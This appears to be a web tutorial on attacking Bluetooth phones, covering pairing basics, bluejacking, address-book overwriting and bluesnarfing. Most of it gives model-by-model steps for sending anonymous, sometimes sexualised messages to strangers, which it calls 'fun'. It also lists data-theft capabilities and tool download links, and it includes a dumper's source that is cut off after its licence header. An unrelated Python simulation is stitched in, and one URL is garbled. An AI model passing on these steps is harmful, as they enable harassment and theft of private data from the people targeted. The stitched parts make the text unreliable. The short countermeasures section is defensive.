An Ethical Guide to Bluetooth Hacking Tutorial with latest Tools

Security Threats

BLUETOOTH HACKING

  • Is the sensitive data on your mobile phone (like e-mails, bank information, passwords, etc.) safe from malicious attackers?
  • Are you receiving annoying unwarranted spam messages on your mobile phone?
  • Are the private SMS text messages that you send to your wife safe from the prying eyes of attackers?
  • Are the photographs stored on your mobile phone safe from being circulated on the Internet and mobile networks?

Mobile phones have become ubiquitous both in their presence and usage in this fast paced, technology savvy world. Gone are the days when mobile phones were merely used as a mobile telephone device to have voice conversations with other users. Today a mobile phone has evolved into many more things: it has also become your camera, your computer, your source to connect to the Internet, your personal organizer, your address book, your e-mail inbox and lots more. In other words, your mobile phone has started holding information that is very private and precious to both individuals and businesses. This opens up a completely new dimension of cracking known as mobile phone cracking.

Most modern day mobile phones ship with inbuilt Bluetooth capabilities. Bluetooth is nothing but a wireless communication standard that allows devices to communicate with one another within a range of 10 metres. In other words, Bluetooth is the protocol that allows Bluetooth enabled devices to transfer files, photographs, address books and other data with one another as long as they are in range. Most mobile phone related attacks or threats involve the Bluetooth communication standard at some level or the other.

Hence, it is a good idea for both crackers and even potential victims to become conversant with the Bluetooth communication standard and understand it better. Bluetooth has indeed replaced physical wires and cables at a variety of places for short range data communication purposes.

The Bluetooth communication protocol can be used to connect a variety of different Bluetooth enabled devices. It can not only be used to connect two similar Bluetooth enabled devices (like two mobile phones), but also two dissimilar Bluetooth enabled devices (like a PDA and a computer). It can also be used in conjunction with other network protocols. For example, one can use a Bluetooth enabled mobile phone or PDA to connect to a computer and then use the computer to connect to the Internet. Almost all Bluetooth communication set-ups can be divided into the two main categories given as follows:

Master-Master Connection

A Master-Master Bluetooth connection set-up is one in which all the Bluetooth devices that are a part of the communication channel have keyboards and can actively and dynamically communicate with one another. For example, when two mobile phones or a PDA and a computer are connected with one another, then, since both Bluetooth devices have a keyboard (or an input device), the connection is known as a Master-Master connection. In such connections, the user has the option of actively entering data and communicating with the other Bluetooth device.

Master-Slave Connection

A Master-Slave Bluetooth connection set-up is one in which one of the devices that are a part of the communication channel does not have a keyboard. For example, the connection between a mobile phone and a Bluetooth enabled headset can be described as a Master-Slave connection. In such a case, since a mobile phone has a keyboard, the user actively controls the data entry and communication with the headset. On the other hand, since the Bluetooth enabled headset does not have a keyboard (or input device), it relies on pre-programmed instructions and data to carry out the communication.

Like any other protocol, even Bluetooth uses a pre-defined procedure for connection establishment. Most Bluetooth connections between any two devices get established by the following main steps (this may not always be the case; read the section on Bluetooth Security Modes later in this chapter for more details):

I. Discovery

Before any two Bluetooth enabled devices can start communicating with one another, they must carry out a procedure known as discovery. In other words, the two Bluetooth enabled devices need to discover the presence of one another. Typically, the discovery procedure is carried out by a Bluetooth device by scanning for other Bluetooth devices within range.

Hacking Truth: Each Bluetooth enabled mobile phone can be put into a variety of different operation modes, which are explained in Table 1.1:

Table 1.1: Bluetooth operation modes (Mode: Meaning)

OFF: Bluetooth has been turned off. Your mobile phone cannot connect to any other Bluetooth device, nor can any other Bluetooth device connect to or discover your mobile phone.
ON: As soon as a Bluetooth communication channel is established with another device, your mobile phone’s mode is set to the ON mode.
DISCOVERABLE (or SHOWN TO ALL): Even though no current communication channels are active, the mobile phone is in discoverable mode and can be discovered by any other Bluetooth enabled device within a range of 10 metres.
HIDDEN: Your mobile phone becomes undiscoverable by unknown devices and will respond only to those that it has been paired with.

II. Pairing

Once the Bluetooth devices have discovered each other, then comes the next step known as pairing. The pairing process is to Bluetooth what the Transmission Control Protocol/Internet Protocol (TCP/IP) handshake is to two computers on the Internet. It allows the two Bluetooth enabled devices (that are trying to set up a communication channel with one another) to exchange important information like addresses, version and, most importantly, the pairing code (consider this to be something like a password) for the connection. Only once this pairing process has been completed successfully can the two devices start communicating with one another with proper access rights and privileges.

Without the entry of the correct pairing code, the Bluetooth connection request will not be accepted. It is important to note that in case of a Master-Master Bluetooth connection, users at both ends are required to enter the pairing code for the connection to get established. For example, when one tries to connect two mobile phones through Bluetooth, then users at both ends are required to enter a pairing code. On the other hand, in case of a Master-Slave connection, the master user is required to enter the pairing code, while the slave automatically reads the pairing code from its pre-programmed instructions. For example, when one tries to connect a mobile phone to its headset, then the pairing code has to be entered at the mobile phone end, while it is automatically read from pre-programmed instructions at the headset end.

When users at both ends enter an identical pairing code, a link key is generated. This link key is then used to carry out the third step known as binding. It is important to note that certain devices may not require the pairing process for the data transfer to start. In other words, on most occasions pairing is an optional process that is usually carried out to bind connections with only those devices that one communicates regularly with. Paired devices are also easier to locate and recognize.

III. Binding

Once the pairing codes have been exchanged by the Bluetooth enabled devices, they dynamically generate and share an encryption key. It is this encryption key that keeps each Bluetooth connection unique and binding. This binding nature of a Bluetooth connection also means that a connection established between two devices can only be used by those two devices. No other device can interfere or snoop on the connection. In other words, if a Bluetooth connection has been established between two mobile phones, then a third arbitrary mobile phone (that is within range) cannot eavesdrop and listen to the data transfer. This also means that at any point of time, a Bluetooth device should technically know all devices with which it is communicating. At this stage, the connection between the two Bluetooth devices is said to be established.

Hence, to recapitulate, each time a device wants to establish a Bluetooth connection with another device, the following steps need to be carried out:

  1. Discovery: Device scans for the target device and discovers it.
  2. Pairing: Devices exchange the pairing code and other information.
  3. Binding: Devices exchange an encryption key and make the connection binding.

Hacking Truth: We just discussed a layman’s description of the three main steps that take place when a Bluetooth connection is established. A behind the scenes look at the various steps that take place to authenticate and establish a Bluetooth connection can be depicted as follows:

  1. The SOURCE Bluetooth device sends its address to the DESTINATION Bluetooth device.
  2. The DESTINATION device asks the SOURCE to answer a random challenge. The user at the SOURCE end enters the pairing code, which is used to compute the link key. This link key is used by the SOURCE to compute the answer to the random challenge.
  3. The DESTINATION computes its own response to the random challenge that it sent to the SOURCE. The SOURCE then sends its response to the DESTINATION.
  4. The DESTINATION compares its response to the response sent by the SOURCE. If they match, then the Bluetooth connection is officially authorized and started.
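The four-step exchange above, together with the pairing code to link key relationship described under Pairing, as an added simulation that is not code from the original page: the key derivation and response functions are HMAC-SHA256 stand-ins (an assumption, not the Bluetooth algorithms, which the page does not describe), and the device addresses and pairing codes are constructed values.

```python
"""Simulation of the four-step authentication exchange described above.

Added example, not code from the original page. The key derivation and
response functions are HMAC-SHA256 stand-ins (an assumption), NOT the
Bluetooth link-key and authentication algorithms, which the page does not
describe. Device addresses and pairing codes below are constructed values.
"""
import hashlib
import hmac
import secrets


def derive_link_key(pairing_code: str, source_addr: str, dest_addr: str) -> bytes:
    """Stand-in link key: the pairing code entered by the user, bound to both
    device addresses so the same code yields a different key for each pair."""
    material = f"{source_addr}|{dest_addr}".encode()
    return hmac.new(pairing_code.encode(), material, hashlib.sha256).digest()


def compute_response(link_key: bytes, challenge: bytes, responder_addr: str) -> bytes:
    """Stand-in response: keyed hash over the random challenge and the
    responding device's address, so it is useless for any other challenge."""
    return hmac.new(link_key, challenge + responder_addr.encode(), hashlib.sha256).digest()


class Device:
    """One Bluetooth endpoint; the same class plays SOURCE or DESTINATION."""

    def __init__(self, name: str, addr: str) -> None:
        self.name = name
        self.addr = addr
        self.peer_addr = None
        self.link_key = None
        self.pending_challenge = None

    def send_address(self, dest: "Device") -> None:
        """Step 1: SOURCE sends its address to DESTINATION."""
        dest.peer_addr = self.addr
        self.peer_addr = dest.addr

    def issue_challenge(self) -> bytes:
        """Step 2 (DESTINATION): pick a fresh random challenge for this attempt."""
        self.pending_challenge = secrets.token_bytes(16)
        return self.pending_challenge

    def answer_challenge(self, pairing_code: str, challenge: bytes) -> bytes:
        """Step 2 (SOURCE): the user enters the pairing code, which gives the
        link key, which in turn gives the answer to the challenge."""
        self.link_key = derive_link_key(pairing_code, self.addr, self.peer_addr)
        return compute_response(self.link_key, challenge, self.addr)

    def verify_response(self, pairing_code: str, response: bytes) -> bool:
        """Steps 3 and 4 (DESTINATION): compute the expected answer from its own
        copy of the pairing code and compare it with what SOURCE sent."""
        self.link_key = derive_link_key(pairing_code, self.peer_addr, self.addr)
        expected = compute_response(self.link_key, self.pending_challenge, self.peer_addr)
        self.pending_challenge = None  # a challenge is good for one answer only
        return hmac.compare_digest(expected, response)


def run_pairing(source_code: str, dest_code: str) -> bool:
    """Walk the exchange end to end; True only if both users entered the same code."""
    source = Device("SOURCE", "00:11:22:33:44:55")       # constructed address
    dest = Device("DESTINATION", "66:77:88:99:AA:BB")     # constructed address
    source.send_address(dest)                             # step 1
    challenge = dest.issue_challenge()                    # step 2
    response = source.answer_challenge(source_code, challenge)
    return dest.verify_response(dest_code, response)      # steps 3 and 4


def replayed_response_rejected() -> bool:
    """An answer captured from one exchange fails against a later one, because
    DESTINATION issues a new random challenge every time."""
    source = Device("SOURCE", "00:11:22:33:44:55")
    dest = Device("DESTINATION", "66:77:88:99:AA:BB")
    source.send_address(dest)
    old_response = source.answer_challenge("1234", dest.issue_challenge())
    dest.issue_challenge()  # the second attempt gets a fresh challenge
    return not dest.verify_response("1234", old_response)


if __name__ == "__main__":
    print("matching codes accepted:", run_pairing("1234", "1234"))
    print("mismatched codes accepted:", run_pairing("1234", "4321"))
    print("replayed answer rejected:", replayed_response_rejected())
```

The pairing code never travels over the air in this exchange; only the challenge and the response do, which is why the two users must type the same code at both ends.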

The Non-secure Security Mode

A Bluetooth device in the non-secure security mode will not implement or follow any security features. In this mode, most of the security features like authentication, pairing and encryption are bypassed and not enforced. For example, when one sends a business card or address book contact through Bluetooth, then the non-secure mode is used and no security is enforced. In other words, when one transfers a business card or address book contact through Bluetooth, then authentication, pairing and encryption are all bypassed. This particular security mode comes into play especially during Bluejacking attacks, which are discussed later in this chapter.

The Service-Level Security Mode

A Bluetooth device in the service-level security mode will have a central security manager that controls access to services and devices. Each time a user wants to connect to such a Bluetooth device, the central security manager controls and implements different security procedures for different applications. Hence, such a security arrangement makes it possible to give a particular user access to a given service, while denying access to other services. In other words, different security measures are applied for different applications and users.

The Link-Level Security Mode

A Bluetooth device in the link-level security mode will implement and enforce authorization and security procedures even before a communication channel is established. In this security mode, proper authentication, pairing and encryption procedures are implemented. Typically, in this security mode the pairing and binding steps described in the previous section are executed to set up the communication channel.

Bluetooth has, without a doubt, revolutionized wireless communication between enabled devices. It is both widely supported and implemented. Unfortunately, like most other protocols, it continues to suffer from a number of threats, loopholes and vulnerabilities.

Case Studies

New York, United States of America

A young lady was sitting at a table in a Starbucks outlet located on a busy street in New York City, sipping on her favorite latte while catching up on the latest fashion tips in Cosmopolitan magazine. Suddenly she found her mobile phone screen light up with an anonymous incoming message,

Hi Beautiful! Looking Good.

Although the lady was slightly alarmed on reading the message and irritated at finding the source number missing, she chose to ignore it and soon went back to her latte and magazine. She probably assumed that she had become a victim of yet another mere spam message campaign. However, within a few minutes her mobile phone again lit up with another anonymous incoming message,

You look real good in your blue top. Wonder how you look without it?

This very personal message caught the lady’s attention and made her sit up. She was actually wearing a blue top and suddenly she felt so unprotected. Not only did she quickly survey the people sitting around her, but she also frantically tried to find out the source number of the received message on her mobile phone. However, after a few minutes of fidgeting with her mobile phone and one more lewd message later, the lady quickly picked up her stuff and walked out of the coffee shop. This blatant invasion of her personal privacy scared her so much that she refused to enter the coffee shop again.

Hong Kong

A successful Hong Kong based entrepreneur with interests in various sectors and regions across Asia was attending a conference on leadership skills. He was one of those people who are used to running their entire business with the mobile phone. From sending sensitive e-mails to creating proposal documents, from sending faxes to making important business conference calls, he was in the habit of doing everything from the convenience of his mobile phone. His mobile phone also allowed him to attend the conference and still not miss any of his business related work. His productivity was at a completely new high. Once the conference was over, the entrepreneur went back home to find an envelope slid beneath the door of his house. When he opened the envelope he found several pages of personal information: e-mails, photographs, phone numbers and other details. It not only contained sensitive business proposals that nobody else knew about, but also contained notes that he had taken at the conference on his mobile phone. That is when he realized that maybe somebody had broken into his mobile phone and stolen all the data from it. But is it really possible to do that, or is that something taken out of fictitious movies?

Singapore

Every Sunday afternoon Mrs Kuok used to take her children to the local shopping mall in the Bedok area of Singapore. A few months back, during one of her weekly shopping trips, Mrs Kuok received an incoming message in the form of a business card on her mobile phone. Following her usual practice, she immediately saved the new business card that she had received through Bluetooth on her mobile phone. When she viewed the business card it read,

HaHa. Cute Children you have.

If that was not enough to scare the lady out of her wits, she soon received yet another message along similar lines. This time she chose not to save the incoming business card and rejected it. For the next hour or so, the lady continued to receive such messages, one after the other, some of which she simply rejected, others which she actually read and got all the more horrified. To this day, the lady has no idea what was happening to her mobile phone on that day in the shopping mall.

Tokyo, Japan

Every evening a group of teenagers who go by the pseudonym of Black Avengers are known to travel by the local trains and visit the most popular shopping malls. Throughout this hobby of theirs, which takes several hours daily from their schedule, all the teenagers are busy pressing a variety of keys on their hand phones. The Black Avengers are not the average group of teenagers that they look, but are actually experienced Bluejackers who love playing pranks with their hand phones. There are many such local rival gangs in Tokyo that compete with the Black Avengers to see who can send the maximum number of Bluejack messages to unsuspecting individuals every single day. Ever wondered what such teenagers do? What gives them the kicks? What keeps them going?

Types of Bluetooth Threats

There are a variety of different types of Bluetooth related threats and attacks that can be executed against unsuspecting mobile phone users.

  1. The Bluejack Attack (OBEX Push Attacks)
  2. Modifying a Remote Mobile Phone’s Address Book
  3. Bluespamming
  4. The Bluesnarf Attack (OBEX Pull Attacks)
  5. The Blue Backdoor Attack
  6. The BlueBug Attack
  7. Other Attacks
     (a) Short Pairing Codes
     (b) Default Pairing Codes
     (c) Random Challenge Response Generators
     (d) Man-in-the-Middle Attacks
     (e) Privacy Concerns
     (f) Brute Force Attacks
     (g) DoS Attacks
     (h) Cracking the Pairing Codes
     (i) Unit Key Attacks
     (j) Impersonation Attacks
  8. Blueprinting
  9. Blue Wardriving

Although most of these Bluetooth related attacks are quite new, they have already become quite common and are widely executed. We shall be discussing all these attacks in detail, in the next few sections.

The Bluejack Attack

Have you ever received an anonymous message on your mobile phone while you were in a crowded public place like a shopping mall, a coffee shop or a library? Ever wondered from where and how you received that message?

Have you ever wanted to send an anonymous message to a cute girl that you just saw in your school but whose mobile phone number you don’t know? The answer to most of these questions and many others is a technique known as the bluejacking attack.

Bluejacking is the process of sending an anonymous message from a Bluetooth enabled phone to another, within a range of 10 meters. Not only does the recipient not know the exact source of the received message, but also bluejacking allows people to send free messages to one another without having to pay any money to the cellular operators. Since bluejacking utilizes the Bluetooth technology present on the mobile phone handset itself (and not the operator) all messages that are sent using it are free.

This technique of sending anonymous free messages has become extremely popular and common in most cities around the world. It not only allows an attacker to use a Bluetooth enabled phone to send an anonymous message to the victim, but any other Bluetooth device like a laptop or a PDA can also be used for the same purpose. Often many people describe bluejacking as another form of messaging.

The best part about bluejacking (which is possible due to the Bluetooth communication standard) is that it allows an attacker to send anonymous messages to the victim. In other words, it is very difficult or almost impossible for a victim to figure out the source of a received message. Traditionally, each time a message or a file was transferred between two devices then both devices knew each other’s identity. This made it extremely easy for an attacker to trace the source of a received file or message. However, with the advent of Bluetooth, which allows the transfer of a message or a file within a radius of 10 meters in any direction, it becomes very difficult for a user to trace the received message or file to its actual source. Invariably, each time bluejacking is performed the victim tries to match the displayed name (that can be customized by the attacker) to every single person around them in a radius of 10 meters in all directions.

This attack can easily be carried out using just a Bluetooth enabled device in a crowded public place where a number of unsuspecting victims are likely to be easily found. Typically, one can carry out a Bluejack attack by simply observing the main steps (which vary slightly depending on the mobile phone that one uses) given as follows:

  1. Create a new address book contact on the Bluetooth enabled device. Enter the anonymous message that has to be sent to the victim in the Name field of the address book. For example, you can write, ‘You look really beautiful in that blue dress’, as the anonymous message in the Name field.
  2. Scan for victim mobile phones that are within a range of 10 meters at that point of time. This process should not take more than 10 seconds or so, and soon an entire list of names of Bluetooth enabled devices will appear on the screen. Although the name of a particular mobile phone can be changed by the user, by default it is set to the phone model number by the manufacturer. Typically, this step is also known as discovery.
  3. Send the new address book contact that you just created to the victim mobile phone using the Bluetooth communication protocol by choosing the name from the displayed list. The victim will receive this anonymous message on his phone (the phone will beep the message tone) and will invariably react with either a startled or shocked expression!

Hacking Truth: We discussed the general framework of carrying out a bluejack attack on a target mobile phone in the previous section. However, just to make things a bit easier, the following are step by step guidelines to carry out a bluejack attack from a variety of different Bluetooth enabled devices:

Laptop/PC

  1. Launch your favorite e-mail client program. (In this example, we are going to use Outlook Express.)
  2. Click on the Addresses tab.
  3. Click on the New tab and select the New Contact option from the dropdown menu.
  4. Enter the anonymous message that you wish to send to the victim in the Name field and save the new contact.
  5. Right click on the new contact that you just created and select Action and then Bluetooth.
  6. Select a device from the list and double click on it to send the anonymous message to the victim. You just performed your first bluejack attack!

Nokia 6310 and 6310i

  1. Select Options > New Contact by pressing the necessary buttons.
  2. Enter the anonymous message that you wish to send to the victim in the first line. Do not enter any phone number in the number field.
  3. Press OK.
  4. Go back to the new contact that you just created in the previous steps.
  5. Select Options > Via Bluetooth.
  6. The mobile phone will now search for all Bluetooth enabled devices within range.
  7. Choose the victim mobile phone from the list and press OK. You just performed your first bluejack attack!

Nokia 6600

  1. Select Names > Add Name by pressing the necessary buttons.
  2. Enter the anonymous message that you wish to send to the victim in the first line. Do not enter any phone number in the number field.
  3. Press OK.
  4. Go back to the New Contact that you just created in the previous steps.
  5. Select Details > Options > Send Business Card > Via Bluetooth.
  6. The mobile phone will now search for all Bluetooth enabled devices within range.
  7. Choose the victim mobile phone from the list and press OK. You just performed your first bluejack attack!

Nokia 7650

  1. Select Names > Add Name by pressing the necessary buttons.
  2. Enter the anonymous message that you wish to send to the victim in the first line. Do not enter any phone number in the number field.
  3. Press OK.
  4. Go back to the New Contact that you just created in the previous steps.
  5. Select Options > Send Business Card > Via Bluetooth.
  6. The mobile phone will now search for all Bluetooth enabled devices within range.
  7. Choose the victim mobile phone from the list and press OK. You just performed your first bluejack attack!

Nokia 8910

  1. Select Names > Add Name by pressing the necessary buttons.
  2. Enter the anonymous message that you wish to send to the victim in the first line. Do not enter any phone number in the number field.
  3. Press OK.
  4. Go back to the new contact that you just created in the previous steps.
  5. Select Options > Send Business Card > Via Bluetooth.
  6. The mobile phone will now search for all Bluetooth enabled devices within range.
  7. Choose the victim mobile phone from the list and press OK. You just performed your first bluejack attack!

Note: Most other Nokia models that support Bluetooth require a procedure very similar to the one described here to carry out a Bluejack attack.

Sony Ericsson T610 / T630

  1. Select Phonebook > Add Contact by pressing the necessary buttons.
  2. Press Add in the name field.
  3. Enter the anonymous message that you wish to send to the victim in the first line. Do not enter any phone number in the number field.
  4. Press OK and then Save.
  5. Go back to the new contact that you just created in the previous steps.
  6. Select More > Send Contact > Via Bluetooth.
  7. The mobile phone will now search for all Bluetooth enabled devices within range.
  8. Choose the victim mobile phone from the list and press
  9. You just performed your first bluejack attack!

Sony Ericsson P900

  1. Select Contacts > New by pressing the necessary buttons.
  2. Press Add in the name field.
  3. Enter the anonymous message that you wish to send to the victim in the Last Name field. Do not enter any phone number in the number field.
  4. Save the new contact entry.
  5. Go back to the New Contact that you just created in the previous steps.
  6. Select Contacts > Send As > Bluetooth > Done.
  7. The mobile phone will now search for all Bluetooth enabled devices within range.
  8. Choose the victim mobile phone from the list and press Send. You just performed your first bluejack attack!

Motorola V500/V600/V551/V547/V555

  1. Select Phone Book > New Entry by pressing the necessary buttons.
  2. Press Add in the name field.
  3. Enter the anonymous message that you wish to send to the victim in the Name field. Do not enter any phone number in the number field.
  4. Save the new contact entry.
  5. Go back to the new contact that you just created in the previous steps and press the Info button on the handset.
  6. Select Send > Bluetooth > Done.
  7. The mobile phone will now search for all Bluetooth enabled devices within range.
  8. Choose the victim mobile phone from the list and press Send. You just performed your first bluejack attack!

One can clearly see that executing a Bluejack attack is very simple and requires nothing but a Bluetooth enabled device and a crowded place. As soon as you send an anonymous message to the victim using Bluejacking, the victim mobile phone will beep the message tone and display a message along the following lines on the screen (except certain mobile handsets like the Nokia 6310i, which do not display any such warning prompt):

Contact Name has just been received by Bluetooth

OR

Business Card has just been received by Bluetooth

Most people immediately press the OK button on their mobile handsets and the bluejack message appears on their phone. It is important to note that the victim mobile phone user can also view all other fields (like number, last name, e-mail, etc.) of the contact entry that was sent by the attacker. Most importantly, since Bluetooth alone was used to send the message (and the operator was not involved at all) the victim will have no clue about the identity of the sender and the message remains anonymous. Hence, ideally bluejacking is a lot of fun when the attacker sends extremely personal messages like ‘Looking real good in that blue dress babe’ or something like ‘I think that top looks very ugly on you’. The more personal the message, the more the victim gets freaked out.

Bluejacking is possible due to a small loophole in the initialization stage of the Bluetooth communication protocol. Before any two Bluetooth enabled devices can start communicating with one another, there is an initial handshake period when the two devices exchange certain information with one another. During the handshake period one of the steps requires the device name of the initiating Bluetooth device to be displayed on the target Bluetooth device screen. At this step it is possible for the initiating device to send a user defined field (maximum 248 characters) to the target device. It is exactly this field that is used by Bluejacking to send the anonymous message to the target mobile phone. This attack is sometimes also known as the OBEX push attack since it allows attackers to push data or messages to the victim’s mobile phone.

Hacking Truth: The OBEX or Object Exchange protocol is the de facto protocol used by most wireless devices to exchange data with one another. This protocol runs over both TCP/IP and Bluetooth and is used to exchange files, pictures, business cards, calendar entries and various other types of data between wireless devices. The Bluetooth communication standard extensively uses OBEX for communication and transfer purposes. Since Bluejacking is a form of an attack wherein a Bluetooth message (a business card, to be precise) is sent or pushed onto the victim mobile phone device, it is also sometimes known as the OBEX push attack.

Bluejacking does not remove or modify any data stored on the victim’s mobile phone. Although Bluejacking cannot cause any permanent damage to a mobile phone, it can definitely get extremely irritating and disruptive for the victim mobile phone user. Hence, on most occasions, Bluejacking proves to be more of a fun attack (usually to scare people or to flirt with people) than a malicious one. Another limiting factor related to such attacks is the fact that they can be executed only when both the Bluetooth enabled devices are within 10 meters of one another. Nonetheless Bluejacking is an excellent specimen attack that allows us to better understand other attacks that we shall discuss later in the book.

One malicious use of Bluejacking can possibly be to fool unsuspecting individuals into believing spam messages. For example, an attacker can send the following message to an unsuspecting victim:

You have just won the ABC Jackpot of 10,000 dollars. Dial 1800-234-567-102.

If the victim were to actually believe this message and dial the mentioned number (many people do) then invariably the number will turn out to be a premium rate number that will charge an exorbitant amount to the victim’s mobile phone. Such Bluejacking messages can easily cause indirect malicious harm to the victim.

The widespread popularity of bluejacking soon led to the development of another technique known as bluetoothing, which can be described as the use of Bluetooth messaging as a medium for hidden meetings or socially frowned upon activities. There are entire websites devoted to organizing Bluetoothing activities in different parts of the world. Another very popular variant of bluejacking is an instant messaging client-server model known as bluechatting. Such a Bluetooth based chatting system is commonly used in crowded public places where people are likely to be within a 10 meter radius of one another.

Hacking Truth: We have already seen how the Object Exchange or OBEX protocol can be used to carry out a variety of different kinds of attacks. It is interesting to note that the same procedure is also used by the Nokia N-Gage mobile phones to allow users to play multiplayer games over a short distance.

Modifying a Remote Mobile Phone’s Address Book

Bluejacking can also be used to modify existing entries made in the victim mobile phone’s address book or contact list. If one were to create a new address book contact having a common name like Home or Work or Honey or any other name (that is the same as an entry already existing in the victim’s address book) and send it to the victim, then it will replace the existing entry. In other words, in order to replace or modify the victim mobile phone user’s address book, one needs to do the following steps:

  1. Create a new address book entry having the same name as that of a contact entry that already exists in the victim’s address book. For example, the victim’s girlfriend’s name or mother’s name or best friend’s name and so on. If you do not know of an entry that already exists in the victim’s address book, then common names like Work or Home can always be used.
  2. Send this newly created address book entry to the victim mobile phone through Bluetooth.
  3. As soon as the victim accepts the Bluetooth message, it shall replace the already existing entry in the address book with the new information like phone number, e-mail address, etc.

Most people rely on their mobile phone so much that they might find it very difficult to deduce the original phone number or original e-mail address that an attacker replaces using the above steps. On certain occasions, such an attack can also be used to carry out impersonation and spoofing.

Hacking Truth: Have you wondered what name shows up when your mobile phone is discovered by your friend? Ever wanted to change the name of your mobile phone, that is used to send or receive a file through Bluetooth? One can easily change the name of their mobile phone by following the below steps (Please note that these instructions are valid on most Nokia phones. Other mobile phones will have a very similar procedure):

  1. Select the menu button to browse to the Bluetooth menu > Bluetooth Settings.
  2. Select the My Phone’s Name option and set it to any name of your choice! It is this name that will be displayed when some other device discovers your mobile phone or communicates with it.

 

Fadia’s Hot Picks for Popular Bluejacking Tools

Although Bluejacking is extremely easy to execute manually from most Bluetooth enabled devices including mobile phones, laptops and PDAs, there are certainly a few tools that can be used to make the life of a Bluejacker a lot easier. Some of them are as follows:

  1. Utility Name: Freejack

Features: Bluejacking tool written in Java.

Download URL: http://wwvisoItware I 3.co.uk/freejack/

 

Countermeasures

Bluejacking is probably one of the easiest and most commonly executed mobile phone related attacks. Hence, it has become extremely important for mobile phone users across the globe to be prepared with some effective countermeasures.

  1. One of the most effective countermeasures against Bluejacking is to simply disable Bluetooth on your mobile phone by going into options. Unfortunately, this would also mean that you will no longer be able to use any Bluetooth enabled accessories or devices with your mobile phone.
  2. However, a more practical countermeasure is to configure your Bluetooth settings and put your phone in the Undiscoverable or Hidden mode. Once you have paired your mobile phone with any Bluetooth enabled devices or accessories that you want to use it with, then you can set its options to the Undiscoverable mode or hidden mode. This will ensure that when the attacker (who is not in the allowed list) searches for Bluetooth devices, your mobile phone will not show up. At the same time one can continue using Bluetooth on their phone to connect to other devices. Based on your mobile phone manufacturer, the following steps can be followed to put your phone in the Undiscoverable mode:

 

Nokia 6310 or 6310i or 6600 or 7650 or 8910 or most other models

  1. Select the Menu button to browse to the Bluetooth menu > Bluetooth Settings.
  2. Select the My Phone’s Visibility option and set it to the Hidden mode.

  3. Especially when one is in a crowded public place, one’s level of alertness should only increase. When one receives the warning prompt that a new contact or business card has been received, one can prevent bluejacking by simply not accepting that incoming message.
  4. It is also a very good idea to change the name that the phone displays to other Bluetooth devices. If one retains the default name then it makes it easier for attackers to find specific private information about your phone like manufacturer, version etc. Moreover, it allows an attacker to easily identify whether your phone is vulnerable or not.
  5. There is no permanent solution that a user can implement to counter Bluejacking without the help of the mobile phone handset manufacturers.

Bluespamming

We have already seen how bluejacking can be used to send anonymous messages to Bluetooth enabled devices within a range of 10 meters in any direction. This concept can easily be slightly modified and used for other malicious purposes like sending spam messages to all Bluetooth enabled devices within range. This technique of sending spam messages to devices using Bluetooth is known as Bluespamming. Many proof-of-concept tools have already been developed for educational purposes to demonstrate such an attack. A number of advertisers, musicians and political parties have even started using such spam messages to propagate and market their product, work or ideas amongst the masses. Such attacks are especially successful when carried out in crowded places like stations, airports, trains, shopping malls, restaurants, conference halls, political rallies, concerts, schools and so on.

The BlueSnarf Attack

Most mobile phone users have a variety of sensitive data stored on their handsets, starting from sensitive address book contact information to personal photographs, from private messages to business cards and so on. An even larger number of people continue to make the assumption that the data stored on their mobile phone is completely safe and secure from the malicious eyes of the outside world. Unfortunately, that is not at all true. It is indeed possible for a malicious attacker to connect to a victim’s mobile phone and gain illegal access to all sensitive data on it.

Bluesnarfing is the process of connecting to vulnerable mobile phones through Bluetooth, without the knowledge of the victim, and gaining illicit access to sensitive data on them. If your mobile phone has Bluetooth on it then chances are that even you are vulnerable to such Bluesnarf attacks. If an attacker is within 10 meters and has the right tools, then he can easily break into the victim’s mobile phone and steal all data stored on it. In the previous section we discussed how it is possible for an attacker to push anonymous messages or data onto the victim’s mobile phone using OBEX push. Bluesnarfing can be described as the complete opposite – it is an attack wherein the attacker is able to steal sensitive data from a vulnerable mobile phone using OBEX pull. In other words, since this attack involves the use of the OBEX protocol to forcibly pull sensitive data out of the victim’s mobile phone, it is also known as the OBEX pull attack.

Many Nokia, Sony and Ericsson handsets are vulnerable to such anonymous data pull attacks. The extent of vulnerability and damage possible through such Bluesnarfing attacks generally depends on the type of Bluetooth implementation being used by the target mobile phone. Such bluesnarfing attacks can be executed by simply following the steps given here:

  1. This attack requires the attacker to use a J2ME enabled mobile phone as the attack tool.
  2. With your J2ME enabled phone in hand, go to a crowded public place or within 10 meters of the victim mobile phone user.
  3. Once you are within range of the target mobile phone, use any of the tools described later in this section (like Blooover, Redsnarf, Bluesnarf and others) to break into the target mobile phone. It is possible to steal any of the following sensitive data or carry out any of the below activities:

  • Address Book
  • Photographs
  • Music
  • Videos
  • Calendar
  • International Mobile Equipment Identity (IMEI)
  • Clock
  • Business Card Information
  • Properties
  • Writing Address Book Entries
  • Reading/Decoding SMS Messages
  • Setting Call Forwards
  • Initiating a New Phone Call to a pre-defined number
  • Most other local data.

Some of the most interesting malicious activities that one can carry out on a snarfed mobile phone are reading/decoding an SMS message, making a phone call to a pre-defined number (for example, a premium rate number) and accessing the address book of the victim.

Fadia’s Hot Picks for Popular Bluesnarfing Tools

Bluesnarfing attacks can easily be executed with the help of several proof-of-concept tools, namely:

 

  1. Utility Name: Blooover

Features: Blooover is supposed to be a mobile phone security audit tool that runs on J2ME phones. It can also be used to pull sensitive data from vulnerable handheld devices that are within its range. It is one of the best tools related to Bluejacking available. It can also be used to carry out the BlueBug attack.

Download URL: http://www.trifinite.org

  2. Utility Name: Redsnarf

Features: Redsnarf can be used to gain illicit access to vulnerable mobile phones without the knowledge of the victim. It can then be used to steal sensitive data stored on the victim’s mobile phone.

Download URL: http://www.atstake.org

  3. Utility Name: Bluesnarfer

Features: Another variant tool that allows Bluesnarfing.

Download URL: http://www.alighieri.org/tools/bluesnarfer.tar.gz

  4. Utility Name: Bluetooth Phone Book Dumper

Features: Steals the phone book from various mobile phones (including Nokia 6310i and a few Ericsson phones).

Source Code:

```c
/*
 * btxml.c
 *
 * Creates a backup of the Nokia 6310i via Bluetooth. Outputs data to
 * stdout in xml format. This is plug'n'play, no need to enter any data
 * on the host or phone side.
 * Just saw that it somehow works for Ericsson T610 and T611, too. They
 * don't support text mode sms... :(
 *
 * Copyright (C) 2004 by Andreas Oberritter <obi@software.de>
 *
 * This program is free software; you can redistribute it and/or modify
 * it under the terms of the GNU General Public License as published by
 * the Free Software Foundation; either version 2 of the License, or
 * (at your option) any later version.
 *
 * This program is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See
 * the GNU General Public License for more details.
